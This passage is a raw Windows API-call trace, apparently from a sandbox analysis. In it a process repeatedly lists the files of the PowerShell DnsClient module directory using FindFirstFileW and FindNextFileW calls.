ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe1d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientServerAddress.cdxml", cAlternateFileName="")) returned 1 [0226.175] FindNextFileW (in: hFindFile=0x1a5cf970, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1444, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTGlobal_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0226.175] FindNextFileW (in: hFindFile=0x1a5cf970, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNrptPolicy_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0226.175] FindNextFileW (in: hFindFile=0x1a5cf970, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48da, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTRule_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0226.175] FindNextFileW (in: hFindFile=0x1a5cf970, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48da, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTRule_v1.0.0.cdxml", cAlternateFileName="")) returned 0 [0226.176] FindClose (in: hFindFile=0x1a5cf970 | out: hFindFile=0x1a5cf970) returned 1 [0226.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.176] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.176] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", lpFilePart=0x0) returned 0x3c [0226.176] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\", lpFilePart=0x0) returned 0x3d [0226.176] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.176] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.176] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x68d, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient.psd1", cAlternateFileName="")) returned 1 [0226.177] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClientPSProvider.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.177] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClientPSProvider.Types.ps1xml", cAlternateFileName="")) returned 1 [0226.177] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf0c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsCmdlets.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.177] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5687, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsCmdlets.Types.ps1xml", cAlternateFileName="")) returned 1 [0226.177] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f78, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsConfig.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.177] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsConfig.Types.ps1xml", cAlternateFileName="")) returned 1 [0226.178] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="dnslookup.dll", cAlternateFileName="")) returned 1 [0226.178] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1198, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClient.cdxml", cAlternateFileName="")) returned 1 [0226.178] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1022, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientCache.cdxml", cAlternateFileName="")) returned 1 [0226.178] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientGlobalSetting.cdxml", cAlternateFileName="")) returned 1 [0226.178] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe1d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientServerAddress.cdxml", cAlternateFileName="")) returned 1 [0226.178] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1444, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTGlobal_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0226.178] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNrptPolicy_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0226.179] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48da, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTRule_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0226.179] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.179] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.179] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", lpFilePart=0x0) returned 0x3c [0226.179] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.179] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dnsclient"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0226.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.179] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.180] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient", lpFilePart=0x0) returned 0x3c [0226.180] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\", lpFilePart=0x0) returned 0x3d [0226.180] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf730 [0226.180] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.180] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x68d, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient.psd1", cAlternateFileName="")) returned 1 [0226.180] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClientPSProvider.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.180] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClientPSProvider.Types.ps1xml", cAlternateFileName="")) returned 1 [0226.181] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf0c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsCmdlets.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.181] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5687, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsCmdlets.Types.ps1xml", cAlternateFileName="")) returned 1 [0226.181] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f78, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsConfig.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.181] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsConfig.Types.ps1xml", cAlternateFileName="")) returned 1 [0226.181] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10352252, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10352252, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10352252, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="dnslookup.dll", cAlternateFileName="")) returned 1 [0226.181] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1198, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClient.cdxml", cAlternateFileName="")) returned 1 [0226.182] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1022, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientCache.cdxml", cAlternateFileName="")) returned 1 [0226.182] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientGlobalSetting.cdxml", cAlternateFileName="")) returned 1 [0226.182] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe1d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DnsClientServerAddress.cdxml", cAlternateFileName="")) returned 1 [0226.182] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1444, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTGlobal_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0226.183] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNrptPolicy_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0226.183] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf97c740, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48da, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_DnsClientNRPTRule_v1.0.0.cdxml", cAlternateFileName="")) returned 1 [0226.184] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf97c740, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf97c740, ftLastAccessTime.dwHighDateTime=0x1d112e3, 